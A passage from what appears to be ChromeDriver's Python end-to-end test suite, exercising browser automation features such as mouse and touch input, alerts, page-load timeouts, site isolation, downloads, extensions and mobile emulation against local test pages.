self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<p contentEditable="true"> <i>hello</i> ' '<b>-></b> </p>\';' 'var input = document.getElementsByTagName("p")[0];' 'input.focus();' 'return input;') element.SendKeys('hello') self.assertEquals(u'hellohello ->', element.GetText()) def testUnexpectedAlertOpenExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.alert("Hi");') self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, '{Alert text : Hi}', self._driver.FindElement, 'tag name', 'divine') # In W3C mode, the alert is dismissed by default. self.assertFalse(self._driver.IsAlertOpen()) class ChromeDriverTestLegacy(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver in Legacy mode.""" def setUp(self): self._driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) def testContextMenuEventFired(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html')) self._driver.MouseMoveTo(self._driver.FindElement('tag name', 'div')) self._driver.MouseClick(2) self.assertTrue(self._driver.ExecuteScript('return success')) def testDragAndDropWithSVGImage(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/drag_and_drop.svg')) drag = self._driver.FindElement("css selector", "#GreenRectangle") drop = self._driver.FindElement("css selector", "#FolderRectangle") self._driver.MouseMoveTo(drag) self._driver.MouseButtonDown() self._driver.MouseMoveTo(drop) self._driver.MouseButtonUp() self.assertTrue(self._driver.IsAlertOpen()) self.assertEquals('GreenRectangle has been dropped into a folder.', self._driver.GetAlertMessage()) self._driver.HandleAlert(True) self.assertEquals('translate(300,55)', drag.GetAttribute("transform")) def testMouseButtonDownAndUp(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mousedown", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new1<br>";' '});' 'div.addEventListener("mouseup", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new2<a></a>";' '});') self._driver.MouseMoveTo(None, 50, 50) self._driver.MouseButtonDown() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) self._driver.MouseButtonUp() self.assertEquals(1, len(self._driver.FindElements('tag name', 'a'))) def testMouseClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') self._driver.MouseMoveTo(div) self._driver.MouseClick() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testMouseDoubleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') self._driver.MouseMoveTo(div, 1, 1) self._driver.MouseDoubleClick() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testMouseMoveTo(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mouseover", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') self._driver.MouseMoveTo(div, 10, 10) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testMoveToElementAndClick(self): # This page gets rendered differently depending on which platform the test # is running on, and what window size is being used. So we need to do some # sanity checks to make sure that the <a> element is split across two lines # of text. self._driver.Load(self.GetHttpUrlForFile('/chromedriver/multiline.html')) # Check that link element spans two lines and that the first ClientRect is # above the second. link = self._driver.FindElements('tag name', 'a')[0] client_rects = self._driver.ExecuteScript( 'return arguments[0].getClientRects();', link) self.assertEquals(2, len(client_rects)) self.assertTrue(client_rects[0]['bottom'] <= client_rects[1]['top']) # Check that the center of the link's bounding ClientRect is outside the # element. bounding_client_rect = self._driver.ExecuteScript( 'return arguments[0].getBoundingClientRect();', link) center = bounding_client_rect['left'] + bounding_client_rect['width'] / 2 self.assertTrue(client_rects[1]['right'] < center) self.assertTrue(center < client_rects[0]['left']) self._driver.MouseMoveTo(link) self._driver.MouseClick() self.assertTrue(self._driver.GetCurrentUrl().endswith('#top')) def _FindElementInShadowDom(self, css_selectors): """Find an element inside shadow DOM using CSS selectors. The last item in css_selectors identify the element to find. All preceding selectors identify the hierarchy of shadow hosts to traverse in order to reach the target shadow DOM.""" current = None for selector in css_selectors: if current is None: # First CSS selector, start from root DOM. current = self._driver else: # current is a shadow host selected previously. # Enter the corresponding shadow root. current = self._driver.ExecuteScript( 'return arguments[0].shadowRoot', current) current = current.FindElement('css selector', selector) return current def testShadowDomDisplayed(self): """Checks that trying to manipulate shadow DOM elements that are detached from the document raises a StaleElementReference exception""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) self.assertTrue(elem.IsDisplayed()) elem2 = self._driver.FindElement("css selector", "#hostContent") self.assertTrue(elem2.IsDisplayed()) self._driver.ExecuteScript( 'document.querySelector("#outerDiv").style.display="None";') self.assertFalse(elem.IsDisplayed()) def testSendingTabKeyMovesToNextInputElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html')) first = self._driver.FindElement('css selector', '#first') second = self._driver.FindElement('css selector', '#second') first.Click() self._driver.SendKeys('snoopy') self._driver.SendKeys(u'\uE004') self._driver.SendKeys('prickly pete') self.assertEquals('snoopy', self._driver.ExecuteScript( 'return arguments[0].value;', first)) self.assertEquals('prickly pete', self._driver.ExecuteScript( 'return arguments[0].value;', second)) def testSendingTabKeyMovesToNextInputElementEscapedTab(self): """This behavior is not specified by the WebDriver standard but it is supported by us de facto. According to this table https://www.w3.org/TR/webdriver/#keyboard-actions the code point 0x09 (HT) must be sent to the browser via a CompositionEvent. We however historically have been sending it as KeyEvent with code = ui::VKEY_TAB which leads to focus change. For the sake of contrast GeckoDriver and Firefox do not show this behavior. If in the future it turns out that our current behavior is undesirable we can remove this test. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html')) first = self._driver.FindElement('css selector', '#first') second = self._driver.FindElement('css selector', '#second') first.Click() self._driver.SendKeys('snoopy\tprickly pete') self.assertEquals('snoopy', first.GetProperty('value')) self.assertEquals('prickly pete', second.GetProperty('value')) def testMobileEmulationDisabledByDefault(self): self.assertFalse(self._driver.capabilities['mobileEmulationEnabled']) def testSendKeysToElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testUnexpectedAlertOpenExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.alert("Hi");') self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, 'unexpected alert open: {Alert text : Hi}', self._driver.FindElement, 'tag name', 'divine') def testTouchScrollElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) scroll_left = 'return document.documentElement.scrollLeft;' scroll_top = 'return document.documentElement.scrollTop;' self.assertEquals(0, self._driver.ExecuteScript(scroll_left)) self.assertEquals(0, self._driver.ExecuteScript(scroll_top)) target = self._driver.FindElement('css selector', '#target') self._driver.TouchScroll(target, 47, 53) # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1179 self.assertAlmostEqual(47, self._driver.ExecuteScript(scroll_left), delta=1) self.assertAlmostEqual(53, self._driver.ExecuteScript(scroll_top), delta=1) def testTouchDoubleTapElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') target.DoubleTap() events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart touchend touchstart touchend', events.GetText()) def testTouchLongPressElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') target.LongPress() events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart touchcancel', events.GetText()) def testTouchSingleTapElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') target.SingleTap() events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart touchend', events.GetText()) class ChromeDriverSiteIsolation(ChromeDriverBaseTestWithWebServer): """Tests for ChromeDriver with the new Site Isolation Chrome feature. This feature can be turned on using the --site-per-process flag. In order to trick the test into thinking that we are on two separate origins, the cross_domain_iframe.html code points to localhost instead of 127.0.0.1. Note that Chrome does not allow "localhost" to be passed to --isolate-origins for fixable technical reasons related to subdomain matching. """ def setUp(self): self._driver = self.CreateDriver(chrome_switches=['--site-per-process']) def testCanClickOOPIF(self): """Test that you can click into an Out of Process I-Frame (OOPIF). Note that the Iframe will not be out-of-process if the correct flags are not passed into Chrome. """ if util.GetPlatformName() == 'win': # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 # This test is unreliable on Windows, as FindElement can be called too # soon, before the child frame is fully loaded. This causes element not # found error. Add an implicit wait works around this issue. self._driver.SetTimeouts({'implicit': 2000}) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/cross_domain_iframe.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self.assertTrue(self.WaitForCondition( lambda: 'outer.html' in self._driver.ExecuteScript('return window.location.href'))) self.assertTrue(self.WaitForCondition( lambda: 'complete' == self._driver.ExecuteScript('return document.readyState'))) self._driver.SwitchToMainFrame() a_outer = self._driver.FindElement('tag name', 'a') a_outer.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#one')) self._driver.SwitchToFrame(frame) a_inner = self._driver.FindElement('tag name', 'a') a_inner.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#two')) class ChromeDriverPageLoadTimeoutTest(ChromeDriverBaseTestWithWebServer): class _RequestHandler(object): def __init__(self): self.request_received_event = threading.Event() self.send_response_event = threading.Event() def handle(self, request): self.request_received_event.set() # Don't hang infinitely, 10 seconds are enough. self.send_response_event.wait(10) self.send_response_event.clear() return {'Cache-Control': 'no-store'}, 'Hi!' def setUp(self): self._handler = ChromeDriverPageLoadTimeoutTest._RequestHandler() self._http_server.SetCallbackForPath('/hang', self._handler.handle) super(ChromeDriverPageLoadTimeoutTest, self).setUp() self._driver = self.CreateDriver( chrome_switches=['host-resolver-rules=MAP * 127.0.0.1']) self._initial_url = self.GetHttpUrlForFile('/chromedriver/empty.html') self._driver.Load(self._initial_url) # When send_response_event is set, navigating to the hang URL takes only # about 0.1 second on Linux and Windows, but takes half a second or longer # on Mac. So we use longer timeout on Mac, 0.5 second on others. timeout = 3000 if util.GetPlatformName() == 'mac' else 500 self._driver.SetTimeouts({'pageLoad': timeout}) def tearDown(self): super(ChromeDriverPageLoadTimeoutTest, self).tearDown() self._http_server.SetCallbackForPath('/hang', None) def _LoadHangingUrl(self, host=None): self._driver.Load(self._http_server.GetUrl(host) + '/hang') def _CheckPageLoadTimeout(self, action): self._handler.request_received_event.clear() timed_out = False try: action() except chromedriver.ChromeDriverException as e: self.assertNotEqual(-1, e.message.find('timeout')) timed_out = True finally: self._handler.send_response_event.set() self.assertTrue(timed_out) # Verify that the browser actually made that request. self.assertTrue(self._handler.request_received_event.wait(1)) def testPageLoadTimeout(self): self._CheckPageLoadTimeout(self._LoadHangingUrl) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testPageLoadTimeoutCrossDomain(self): # Cross-domain navigation is likely to be a cross-process one. In this case # DevToolsAgentHost behaves quite differently and does not send command # responses if the navigation hangs, so this case deserves a dedicated test. self._CheckPageLoadTimeout(lambda: self._LoadHangingUrl('foo.bar')) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testHistoryNavigationWithPageLoadTimeout(self): # Allow the page to load for the first time. self._handler.send_response_event.set() self._LoadHangingUrl() self.assertTrue(self._handler.request_received_event.wait(1)) self._driver.GoBack() self._CheckPageLoadTimeout(self._driver.GoForward) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testRefreshWithPageLoadTimeout(self): # Allow the page to load for the first time. self._handler.send_response_event.set() self._LoadHangingUrl() self.assertTrue(self._handler.request_received_event.wait(1)) self._CheckPageLoadTimeout(self._driver.Refresh) class ChromeDriverAndroidTest(ChromeDriverBaseTest): """End to end tests for Android-specific tests.""" def testLatestAndroidAppInstalled(self): if ('stable' not in _ANDROID_PACKAGE_KEY and 'beta' not in _ANDROID_PACKAGE_KEY): return self._driver = self.CreateDriver() try: omaha_list = json.loads( six.moves.urllib.request.urlopen('http://omahaproxy.appspot.com/all.json').read()) for l in omaha_list: if l['os'] != 'android': continue for v in l['versions']: if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or ('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)): omaha = list(map(int, v['version'].split('.'))) device = list(map(int, self._driver.capabilities['browserVersion'].split('.'))) self.assertTrue(omaha <= device) return raise RuntimeError('Malformed omaha JSON') except six.moves.urllib.error.URLError as e: print('Unable to fetch current version info from omahaproxy (%s)' % e) def testDeviceManagement(self): self._drivers = [self.CreateDriver() for _ in device_utils.DeviceUtils.HealthyDevices()] self.assertRaises(chromedriver.UnknownError, self.CreateDriver) self._drivers[0].Quit() self._drivers[0] = self.CreateDriver() def testAndroidGetWindowSize(self): self._driver = self.CreateDriver() size = self._driver.GetWindowRect() script_size = self._driver.ExecuteScript( 'return [window.outerWidth, window.outerHeight, 0, 0]') self.assertEquals(size, script_size) script_inner = self._driver.ExecuteScript( 'return [window.innerWidth * visualViewport.scale, ' 'window.innerHeight * visualViewport.scale]') # Subtract inner size by 1 to compensate for rounding errors. self.assertLessEqual(script_inner[0] - 1, size[0]) self.assertLessEqual(script_inner[1] - 1, size[1]) # Sanity check: screen dimensions in the range 20-20000px self.assertLessEqual(size[0], 20000) self.assertLessEqual(size[1], 20000) self.assertGreaterEqual(size[0], 20) self.assertGreaterEqual(size[1], 20) class ChromeDownloadDirTest(ChromeDriverBaseTest): def __init__(self, *args, **kwargs): super(ChromeDownloadDirTest, self).__init__(*args, **kwargs) self._temp_dirs = [] def CreateTempDir(self): temp_dir = tempfile.mkdtemp() self._temp_dirs.append(temp_dir) return temp_dir def RespondWithCsvFile(self, request): return {'Content-Type': 'text/csv'}, 'a,b,c\n1,2,3\n' def WaitForFileToDownload(self, path): deadline = monotonic() + 60 while True: time.sleep(0.1) if os.path.isfile(path) or monotonic() > deadline: break self.assertTrue(os.path.isfile(path), "Failed to download file!") def tearDown(self): # Call the superclass tearDown() method before deleting temp dirs, so that # Chrome has a chance to exit before its user data dir is blown away from # underneath it. super(ChromeDownloadDirTest, self).tearDown() for temp_dir in self._temp_dirs: # Deleting temp dir can fail if Chrome hasn't yet fully exited and still # has open files in there. So we ignore errors, and retry if necessary. shutil.rmtree(temp_dir, ignore_errors=True) retry = 0 while retry < 10 and os.path.exists(temp_dir): time.sleep(0.1) shutil.rmtree(temp_dir, ignore_errors=True) def testFileDownloadWithClick(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithClickHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadAfterTabHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/empty.html')) new_window = driver.NewWindow(window_type='tab') driver.SwitchToWindow(new_window['handle']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithGet(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = self.CreateDriver(download_dir=download_dir) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testFileDownloadWithGetHeadless(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testDownloadDirectoryOverridesExistingPreferences(self): user_data_dir = self.CreateTempDir() download_dir = self.CreateTempDir() sub_dir = os.path.join(user_data_dir, 'Default') os.mkdir(sub_dir) prefs_file_path = os.path.join(sub_dir, 'Preferences') prefs = { 'test': 'this should not be changed', 'download': { 'default_directory': '/old/download/directory' } } with open(prefs_file_path, 'w') as f: json.dump(prefs, f) driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir], download_dir=download_dir) with open(prefs_file_path) as f: prefs = json.load(f) self.assertEqual('this should not be changed', prefs['test']) download = prefs['download'] self.assertEqual(download['default_directory'], download_dir) class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes chromeOptions.args capabilities. Makes sure the switches are passed to Chrome. """ def testSwitchWithoutArgument(self): """Tests that switch --dom-automation can be passed to Chrome. Unless --dom-automation is specified, window.domAutomationController is undefined. """ driver = self.CreateDriver(chrome_switches=['dom-automation']) self.assertNotEqual( None, driver.ExecuteScript('return window.domAutomationController')) def testRemoteDebuggingPort(self): """Tests that passing --remote-debugging-port through capabilities works. """ # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = next(ports_generator) port_flag = 'remote-debugging-port=%s' % port try: driver = self.CreateDriver(chrome_switches=[port_flag]) except: continue driver.Load('chrome:version') command_line = driver.FindElement('css selector', '#command_line').GetText() self.assertIn(port_flag, command_line) break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class ChromeDesiredCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes desired capabilities.""" def testDefaultTimeouts(self): driver = self.CreateDriver() timeouts = driver.GetTimeouts() # Compare against defaults in W3C spec self.assertEquals(timeouts['implicit'], 0) self.assertEquals(timeouts['pageLoad'], 300000) self.assertEquals(timeouts['script'], 30000) def testTimeouts(self): driver = self.CreateDriver(timeouts = { 'implicit': 123, 'pageLoad': 456, 'script': 789 }) timeouts = driver.GetTimeouts() self.assertEquals(timeouts['implicit'], 123) self.assertEquals(timeouts['pageLoad'], 456) self.assertEquals(timeouts['script'], 789) # Run in Legacy mode def testUnexpectedAlertBehaviourLegacy(self): driver = self.CreateDriver(unexpected_alert_behaviour="accept", send_w3c_capability=False, send_w3c_request=False) self.assertEquals("accept", driver.capabilities['unexpectedAlertBehaviour']) driver.ExecuteScript('alert("HI");') self.WaitForCondition(driver.IsAlertOpen) self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, 'unexpected alert open: {Alert text : HI}', driver.FindElement, 'tag name', 'div') self.assertFalse(driver.IsAlertOpen()) def testUnexpectedAlertBehaviourW3c(self): driver = self.CreateDriver(unexpected_alert_behaviour='accept', send_w3c_capability=True, send_w3c_request=True) self.assertEquals('accept', driver.capabilities['unhandledPromptBehavior']) driver.ExecuteScript('alert("HI");') self.WaitForCondition(driver.IsAlertOpen) # With unhandledPromptBehavior=accept, calling GetTitle (and most other # endpoints) automatically dismisses the alert, so IsAlertOpen() becomes # False afterwards. self.assertEquals(driver.GetTitle(), '') self.assertFalse(driver.IsAlertOpen()) class ChromeExtensionsCapabilityTest(ChromeDriverBaseTestWithWebServer): """Tests that chromedriver properly processes chromeOptions.extensions.""" def _PackExtension(self, ext_path): return base64.b64encode(open(ext_path, 'rb').read()) def testExtensionsInstall(self): """Checks that chromedriver can take the extensions in crx format.""" crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx') crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx') self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1), self._PackExtension(crx_2)]) def testExtensionsInstallZip(self): """Checks that chromedriver can take the extensions in zip format.""" zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip') self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)]) def testCanInspectBackgroundPage(self): crx = os.path.join(_TEST_DATA_DIR, 'ext_bg_page.crx') driver = self.CreateDriver( chrome_extensions=[self._PackExtension(crx)], experimental_options={'windowTypes': ['background_page']}) handles = driver.GetWindowHandles() for handle in handles: driver.SwitchToWindow(handle) if driver.GetCurrentUrl() == 'chrome-extension://' \ 'nibbphkelpaohebejnbojjalikodckih/_generated_background_page.html': self.assertEqual(42, driver.ExecuteScript('return magic;')) return self.fail("couldn't find generated background page for test extension") def testIFrameWithExtensionsSource(self): crx_path = os.path.join(_TEST_DATA_DIR, 'frames_extension.crx') driver = self.CreateDriver( chrome_extensions=[self._PackExtension(crx_path)]) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/iframe_extension.html') driver.SwitchToFrame('testframe') element = driver.FindElement('css selector', '#p1') self.assertEqual('Its a frame with extension source', element.GetText()) def testDontExecuteScriptsInContentScriptContext(self): # This test extension has a content script which runs in all frames (see # https://developer.chrome.com/extensions/content_scripts) which causes each # frame on the page to be associated with multiple JS execution contexts. # Make sure that ExecuteScript operates on the page's context, rather than # the extension's content script's one. extension_path = os.path.join(_TEST_DATA_DIR, 'all_frames') driver = self.CreateDriver( chrome_switches=['load-extension=%s' % extension_path]) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/container.html') driver.SwitchToMainFrame() self.assertEqual('one', driver.ExecuteScript("return window['global_var']")) driver.SwitchToFrame('iframe') self.assertEqual('two', driver.ExecuteScript("return window['iframe_var']")) class ChromeLogPathCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes chromeOptions.logPath.""" LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!' def testChromeLogPath(self): """Checks that user can specify the path of the chrome log. Verifies that a log message is written into the specified log file. """ tmp_log_path = tempfile.NamedTemporaryFile() driver = self.CreateDriver(chrome_log_path=tmp_log_path.name) driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE) driver.Quit() self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read()) class MobileEmulationCapabilityTest(ChromeDriverBaseTestWithWebServer): """Tests that ChromeDriver processes chromeOptions.mobileEmulation. Makes sure the device metrics are overridden in DevTools and user agent is overridden in Chrome. """ # Run in Legacy mode def testDeviceMetricsWithStandardWidth(self): driver = self.CreateDriver( send_w3c_capability=False, send_w3c_request=False, mobile_emulation = { 'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3}, 'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui' 'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr' 'ome/18.0.1025.166 Mobile Safari/535.19' }) driver.SetWindowRect(600, 400, None, None) driver.Load(self._http_server.GetUrl() + '/userAgent') self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertEqual(360, driver.ExecuteScript('return window.screen.width')) self.assertEqual(640, driver.ExecuteScript('return window.screen.height')) # Run in Legacy mode def testDeviceMetricsWithDeviceWidth(self): driver = self.CreateDriver( send_w3c_capability=False, send_w3c_request=False, mobile_emulation = { 'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3}, 'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui' 'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr' 'ome/18.0.1025.166 Mobile Safari/535.19' }) driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth') self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertEqual(360, driver.ExecuteScript('return window.screen.width')) self.assertEqual(640, driver.ExecuteScript('return window.screen.height')) def testUserAgent(self): driver = self.CreateDriver( mobile_emulation = {'userAgent': 'Agent Smith'}) driver.Load(self._http_server.GetUrl() + '/userAgent') body_tag = driver.FindElement('tag name', 'body') self.assertEqual("Agent Smith", body_tag.GetText()) def testDeviceName(self): driver = self.CreateDriver( mobile_emulation = {'deviceName': 'Nexus 5'}) driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth') self.assertEqual(360, driver.ExecuteScript('return window.screen.width')) self.assertEqual(640, driver.ExecuteScript('return window.screen.height')) body_tag = driver.FindElement('tag name', 'body') self.assertRegexpMatches( body_tag.GetText(), '^' + re.escape('Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) ' 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/') + r'\d+\.\d+\.\d+\.\d+' + re.escape(' Mobile Safari/537.36') + '$') def testSendKeysToElement(self): driver = self.CreateDriver( mobile_emulation = {'deviceName': 'Nexus 5'}) text = driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testClickElement(self): driver = self.CreateDriver( mobile_emulation = {'deviceName': 'Nexus 5'}) driver.Load('about:blank') div = driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("click", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.Click() self.assertEquals(1, len(driver.FindElements('tag name', 'br'))) # Run in Legacy mode def testTapElement(self): driver = self.CreateDriver( send_w3c_capability=False, send_w3c_request=False, mobile_emulation = {'deviceName': 'Nexus 5'}) driver.Load('about:blank') div = driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("touchstart", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.SingleTap() self.assertEquals(1, len(driver.FindElements('tag name', 'br'))) def testNetworkConnectionDisabledByDefault(self): driver = self.CreateDriver() self.assertFalse(driver.capabilities['networkConnectionEnabled']) def testNetworkConnectionUnsupported(self): driver = self.CreateDriver() # Network connection capability must be enabled to set/retrieve self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) self.assertRaises(chromedriver.UnknownError, driver.SetNetworkConnection, 0x1) # Run in Legacy mode def testNetworkConnectionEnabled(self): # mobileEmulation must be enabled for networkConnection to be enabled driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True, send_w3c_capability=False, send_w3c_request=False) self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertTrue(driver.capabilities['networkConnectionEnabled']) def testEmulateNetworkConnection4g(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Test 4G connection. connection_type = 0x8 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testEmulateNetworkConnectionMultipleBits(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with 4G, 3G, and 2G bits on. # Tests that 4G takes precedence. connection_type = 0x38 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testWifiAndAirplaneModeEmulation(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with both Wifi and Airplane Mode on. # Tests that Wifi takes 